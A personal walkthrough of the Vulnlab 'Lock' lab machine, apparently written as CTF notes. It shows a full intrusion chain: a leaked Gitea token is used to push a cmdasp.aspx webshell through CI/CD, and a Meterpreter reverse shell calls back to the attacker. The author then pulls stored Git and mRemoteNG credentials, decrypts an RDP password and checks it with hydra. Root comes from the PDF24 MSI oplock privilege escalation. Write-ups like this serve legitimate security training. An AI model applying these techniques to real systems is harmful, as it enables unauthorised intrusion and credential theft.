Here is my notes on LOCK box from Vulnlab which deployed to Hackthebox.
LOCK: 10.10.67.86
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Lock - Index
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
smbclient -N -L 10.10.67.86
session setup failed: NT_STATUS_ACCESS_DENIED
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=09d2fa0850069bd9; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=TRqsfIBdcW2dOMeZd6j8_RCXyr46MTczMTQyOTQyNTQ2MzY0OTgwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
-Gitea site.
Gitea Version 1.21.3.
Explore Section:
repos.py from ellen.freeman user.
ellen.freeman/dev-scripts/repos.py.
http://10.10.67.86:3000/ellen.freeman/dev-scripts/commit/8b78e6c3024416bce55926faa3f65421a25d6370
PERSONAL_ACCESS_TOKEN = '43ce39bb0bd6bc489284f2905f033ca467a6362f'
Got a Token.
export GITEA_ACCESS_TOKEN="43ce39bb0bd6bc489284f2905f033ca467a6362f"
┌──(root㉿kali)-[/home/kali/VULNLAB/LOCK/10.10.67.86]
└─# export GITEA_ACCESS_TOKEN="43ce39bb0bd6bc489284f2905f033ca467a6362f"
┌──(root㉿kali)-[/home/kali/VULNLAB/LOCK/10.10.67.86]
└─# python3 repos.py http://10.10.67.86:3000
Repositories:
- ellen.freeman/dev-scripts
- ellen.freeman/website
Gitea Login with Gitea Access Token:
curl -H "Authorization: token 43ce39bb0bd6bc489284f2905f033ca467a6362f" http://10.10.67.86:3000/api/v1/user/repos
http://10.10.67.86:3000/api/v1/user?access_token=43ce39bb0bd6bc489284f2905f033ca467a6362f
{"id":2,"login":"ellen.freeman","login_name":"","full_name":"","email":"ellen.freeman@lock.vl","avatar_url":"http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74","language":"en-US","is_admin":false,"last_login":"2023-12-28T11:38:25-08:00","created":"2023-12-27T11:13:10-08:00","restricted":false,"active":true,"prohibit_login":false,"location":"","website":"","description":"","visibility":"public","followers_count":0,"following_count":0,"starred_repos_count":0,"username":"ellen.freeman"}
git clone http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.10.67.86:3000/ellen.freeman/dev-scripts.git
git clone http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.10.67.86:3000/ellen.freeman/website.git
#Found a source code of website on TCP Port 80 !
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# ls
assets changelog.txt index.html readme.md
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# cat readme.md
# New Project Website
CI/CD integration is now active - changes to the repository will automatically be deployed to the webserver
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# cat changelog.txt
# Changelog
- Added first website version
Gitea File-Upload with Gitea Access Token:
cd website
echo "This is a new example text file." > example.txt
git add example.txt
git config --global user.name "Kali"
git config --global user.email "kali@kali.com"
git commit -m "Added example.txt file"
git push http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.10.67.86:3000/ellen.freeman/website.git main
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# echo "hello word" > test.txt
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# git add test.txt
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# git config --global user.name "Kali"
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# git config --global user.email "kali@kali.com"
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# git commit -m "Added example text file"
[main 31c6c33] Added example text file
1 file changed, 1 insertion(+)
create mode 100644 test.txt
git push http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.10.67.86:3000/ellen.freeman/website.git main
Now wait for a few seconds to access test.txt file in the web TCP port 80.
Now it works so let's upload a malicious aspx file to gain a web shell.
cp /usr/share/webshells/aspx/cmdasp.aspx .
git add cmdasp.aspx
git push http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.10.67.86:3000/ellen.freeman/website.git main
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# cp /usr/share/webshells/aspx/cmdasp.aspx .
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# git add cmdasp.aspx
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# git commit -m "Malicious File"
[main ddfd234] Malicious File
1 file changed, 42 insertions(+)
create mode 100644 cmdasp.aspx
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# git push http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.10.67.86:3000/ellen.freeman/website.git main
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 4 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 982 bytes | 982.00 KiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.10.67.86:3000/ellen.freeman/website.git
31c6c33..ddfd234 main -> main
http://10.10.67.86/cmdasp.aspx
#Webshell GAINED on TCP PORT 80 !
Convert it to USER-SHELL as usual.
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.8.0.71:1234
[*] Sending stage (200774 bytes) to 10.10.67.86
[*] Meterpreter session 1 opened (10.8.0.71:1234 -> 10.10.67.86:50390) at 2024-11-12 13:16:36 -0500
meterpreter > shell
Process 3244 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.2159]
(c) Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
lock\ellen.freeman
c:\windows\system32\inetsrv>hostname
hostname
Lock
POST-EXPLOITATION:
ellen.freeman -> gale.dekarios:
c:\Users\ellen.freeman>type .git-credentials
type .git-credentials
http://ellen.freeman:YWFrWJk9uButLeqx@localhost:3000
c:\Users\ellen.freeman>type .gitconfig
type .gitconfig
[user]
email = ellen.freeman@oplock.vl
name = Ellen Freeman
[safe]
directory = C:/inetpub/wwwroot
[credential "http://localhost:3000"]
provider = generic
ellen.freeman:YWFrWJk9uButLeqx #NOPE for SSH.
c:\Users\ellen.freeman\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is A03D-9CEF
Directory of c:\Users\ellen.freeman\Documents
12/28/2023 05:59 AM <DIR> .
12/28/2023 11:36 AM <DIR> ..
12/28/2023 05:59 AM 3,341 config.xml
1 File(s) 3,341 bytes
2 Dir(s) 8,384,368,640 bytes free
c:\Users\ellen.freeman\Documents>type config.xml
type config.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="sDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy+1FnqfcPQZ3olLRy+DhDFp" ConfVersion="2.6">
<Node Name="RDP/Gale" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="a179606a-a854-48a6-9baa-491d8eb3bddc" Username="Gale.Dekarios" Domain="" Password="TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw==" Hostname="Lock" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true"
[SNIP]
RDP Credential for GALE User.
RDP/Gale
python3 mremoteng_decrypt.py -s "TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw=="
Password: ty8wnW9qCKDosXo6
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Lock
| Not valid before: 2024-11-11T16:31:12
|_Not valid after: 2025-05-13T16:31:12
| rdp-ntlm-info:
| Target_Name: LOCK
| NetBIOS_Domain_Name: LOCK
| NetBIOS_Computer_Name: LOCK
| DNS_Domain_Name: Lock
| DNS_Computer_Name: Lock
| Product_Version: 10.0.20348
|_ System_Time: 2024-11-12T16:31:50+00:00
|_ssl-date: 2024-11-12T16:32:30+00:00; -53m49s from scanner time.
hydra -l gale.dekarios -p ty8wnW9qCKDosXo6 -u -f -t 1 10.10.67.86 rdp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-12 13:31:07
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking rdp://10.10.67.86:3389/
[3389][rdp] host: 10.10.67.86 login: gale.dekarios password: ty8wnW9qCKDosXo6
[STATUS] attack finished for 10.10.67.86 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-12 13:31:10
#FROM Gitea POST-EXPLOITATION.
xfreerdp /u:gale.dekarios /p:'ty8wnW9qCKDosXo6' /v:10.10.67.86 /drive:share,.
USER.TXT: VL{REDIRECTED}
PRIV ESC:
PDF24 version 11.15.1.
It's vulnerable to local privilege escalation.
https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-msi-installer-in-pdf24-creator-geek-software-gmbh/
C:\>dir /adh
Volume in drive C has no label.
Volume Serial Number is A03D-9CEF
Directory of C:\
12/28/2023 06:17 AM <DIR> $Recycle.Bin
12/27/2023 12:38 PM <DIR> $WinREAgent
12/27/2023 06:14 PM <JUNCTION> Documents and Settings [C:\Users]
12/28/2023 11:24 AM <DIR> ProgramData
12/27/2023 06:14 PM <DIR> Recovery
12/27/2023 06:14 PM <DIR> System Volume Information
12/28/2023 11:23 AM <DIR> _install
0 File(s) 0 bytes
7 Dir(s) 8,390,303,744 bytes free
C:\>cd _install
C:\_install>dir
Volume in drive C has no label.
Volume Serial Number is A03D-9CEF
Directory of C:\_install
12/28/2023 11:21 AM 60,804,608 Firefox Setup 121.0.msi
12/28/2023 05:39 AM 43,593,728 mRemoteNG-Installer-1.76.20.24615.msi
12/14/2023 10:07 AM 462,602,240 pdf24-creator-11.15.1-x64.msi
3 File(s) 567,000,576 bytes
0 Dir(s) 8,390,303,744 bytes free
C:\_install>
https://github.com/googleprojectzero/symboliclink-testing-tools
#Require two cmds:
SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r
msiexec.exe /fa C:\_install\pdf24-creator-11.15.1-x64.msi
If the oplock is set, the cmd window that gets opened when pdf24-PrinterInstall.exe is executed doesn't close. The attacker can then perform the following actions to spawn a SYSTEM shell:
1) right click on the top bar of the cmd window
2) click on properties
3) under options click on the "Legacyconsolemode" link
4) open the link with a browser other than internet explorer or edge (both don't open as SYSTEM when on Win11) #Firefox.
5) in the opened browser window press the key combination CTRL+o
6) type cmd.exe in the top bar and press Enter
SYSTEM-SHELL !
ROOT.TXT: VL{REDIRECTED}
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -53m49s, deviation: 0s, median: -53m49s
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-11-12T16:31:50
|_ start_date: N/A